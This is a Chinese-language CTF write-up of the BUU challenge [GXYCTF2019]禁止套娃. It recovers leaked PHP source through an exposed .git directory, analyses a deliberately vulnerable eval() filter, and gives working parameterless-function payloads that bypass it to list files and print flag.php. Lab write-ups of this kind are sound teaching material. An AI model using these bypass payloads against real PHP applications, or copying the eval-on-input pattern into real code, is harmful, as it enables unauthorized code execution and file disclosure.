BUU-WEB-[GXYCTF2019]禁止套娃

Posted 2021-05-20 TzZzEZ-web

[GXYCTF2019]禁止套娃

页面就一句话，其他啥也没有，抓个包也没有任何提示，于是开始扫描。
扫描到/.git想到git泄露，使用GitHack拷贝源码。

<?php
include "flag.php";
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\\/\\/|filter:\\/\\/|php:\\/\\/|phar:\\/\\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\\((?R)?\\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>

php源码审计。有三层匹配绕过。
1.以get方式提交参数exp。
2.exp中不能包含data,filter,php,phar。（把几种伪协议全部过滤了）
3.exp中不能包含et|na|info|dec|bin|hex|oct|pi|log。
4.@eval($_GET[‘exp’]);（典型的无参数RCE）
想要通过rce执行命令是不太可能了。
另一种思路就是读取flag.php的源码。
介绍几个函数。
scandir():扫描当前目录下的文件。
localeconv():返回一包含本地数字及货币格式信息的数组。
current():返回数组中的当前单元，默认取第一个值。
pos()：current()的别名。
根据上述函数，尝试构建payload：

/?exp=print_r(scandir(current(localeconv())));
/?exp=print_r(scandir(pos(localeconv())));

(注意这里不能用.代替，是因为第二层过滤筛掉了)

flag.php在倒数第二个数组中。
直接读取不显示。
第一种方式：
array_reverse() 函数返回翻转顺序的数组。
（反转之后flag.php被放在第二个数组之中）
next() 函数将内部指针指向数组中的下一个元素，并输出。
payload为：

/?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));

第二种方式：
使用session之前需要通过session_start()告诉PHP使用session，php默认是不主动使用session的。
session_id()可以获取到当前的session id。

/?exp=show_source(session_id(session_start()));